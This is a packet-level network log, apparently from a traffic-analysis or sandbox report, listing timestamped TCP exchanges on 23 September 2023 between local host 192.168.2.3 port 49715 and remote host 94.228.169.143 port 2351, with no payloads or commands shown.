Sep 23, 2023 08:02:09.513874054 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.513895035 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514019966 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514077902 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.514168978 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514245033 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514285088 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514295101 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.514322996 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514369965 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.514393091 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514427900 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514462948 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514477968 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.514532089 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514569044 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514581919 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.514691114 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514750957 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.514796019 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514832973 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514868975 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.514882088 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515016079 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515053034 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515077114 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515141010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515177965 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515199900 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515279055 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515338898 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515368938 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515407085 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515450001 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515476942 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515645981 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515681028 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515702963 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515815020 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515866041 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.515902996 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515940905 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515976906 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.515989065 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.516014099 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516082048 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516118050 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.516150951 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516206980 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.516258001 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516326904 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516379118 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.516418934 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516455889 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516510963 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.516549110 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516586065 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516621113 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516649008 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.516658068 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.516704082 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.557804108 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.557873964 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.557986021 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.834880114 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.834944010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.834968090 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.834989071 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835139990 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835181952 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835287094 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.835346937 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.835517883 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835583925 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835621119 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835661888 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835699081 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835736036 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.835808039 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.835808039 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.835808039 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.835933924 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836057901 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836122990 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.836169004 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836313963 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836350918 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836380005 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.836426020 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836488008 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.836582899 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836622000 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836657047 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836673975 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.836898088 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836935997 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.836965084 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837025881 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837089062 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837096930 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837136030 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837188959 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837203979 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837240934 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837296009 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837311983 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837380886 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837435961 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837522030 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837606907 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837642908 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837658882 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837877989 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837927103 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.837941885 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.837965012 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838021040 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.838035107 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838071108 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838124990 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.838139057 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838349104 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838416100 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.838675976 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838758945 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838807106 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.838810921 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838875055 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.838923931 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.839607000 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.839684010 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.839737892 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.839739084 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.839788914 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.839843035 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.879298925 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.879369974 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.879441023 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.157491922 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157557964 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157596111 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157633066 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157674074 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157711983 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157723904 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.157749891 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157788038 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157799959 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.157799959 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.157825947 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157862902 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157898903 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.157934904 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158134937 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158134937 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158134937 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158216000 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158406973 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158443928 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158483028 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158504963 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158571005 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158576012 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158620119 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158670902 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158674955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158735991 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158773899 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158786058 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158905029 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.158957005 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.158984900 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159029007 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159075975 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.159133911 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159236908 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159293890 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.159324884 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159367085 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159419060 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.159446001 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159495115 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159540892 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.159553051 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159569979 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159620047 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.159703016 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159801006 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159856081 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.159888029 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.159954071 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160012960 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160018921 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.160059929 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160109043 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.160123110 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160180092 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160233974 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.160427094 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160511017 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160562992 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.160567045 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160633087 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160684109 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.160749912 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160779953 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160829067 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.160851955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160909891 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.160959005 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.200757980 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.200825930 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.201075077 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.479418993 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479440928 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479453087 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479465008 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479480982 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479523897 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479543924 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.479582071 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.479623079 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479809046 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479857922 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.479882002 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479912043 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479955912 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.479969978 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.479999065 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480045080 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480072021 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480093956 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480139017 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480154991 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480210066 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480254889 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480258942 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480328083 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480362892 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480370998 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480407000 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480451107 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480604887 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480648041 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480693102 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480767012 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480822086 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.480865002 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.480871916 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481000900 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481050968 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.481070995 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481084108 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481128931 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.481153965 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481198072 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481240988 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.481266022 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481343031 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481389046 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481393099 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.481662035 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481714010 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.481810093 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481864929 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481906891 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.481916904 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.481987000 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482033968 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.482057095 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482125998 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482139111 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482170105 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.482242107 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482254028 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482280016 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482295036 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.482321978 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.482331038 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482515097 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482563019 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.482618093 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482650042 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.482696056 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.482831955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.522578955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.522607088 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.522619963 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.522660017 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.522708893 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.522793055 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801229000 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801255941 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801269054 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801281929 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801299095 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801312923 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801423073 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801476955 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801527977 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801564932 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801564932 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801564932 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801578999 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801636934 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801650047 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801701069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801742077 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801759958 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801784039 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801821947 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801857948 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801929951 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801966906 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.801991940 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.801992893 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802057981 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802066088 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802103996 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802139997 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802158117 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802175999 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802233934 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:10.802251101 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802298069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:10.802334070 CEST	2351	49715	94.228.169.143	192.168.2.3
